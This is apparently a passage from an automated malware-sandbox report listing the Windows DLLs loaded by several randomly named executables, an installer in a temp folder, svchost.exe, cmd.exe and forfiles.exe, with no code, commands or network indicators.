Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: peerdist.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: msvcr100.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usosvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: updatepolicy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usocoreps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usoapi.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: winmm.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: samcli.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: version.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: mpr.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: sfc.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: wininet.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: gpedit.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: activeds.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dssec.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dsuiext.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: framedynos.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dsrole.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: logoncli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: mpr.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: netutils.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ntdsapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: authz.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: adsldpc.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: adsldpc.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: webio.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: schannel.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: wldp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: amsi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: userenv.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: profapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: netutils.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
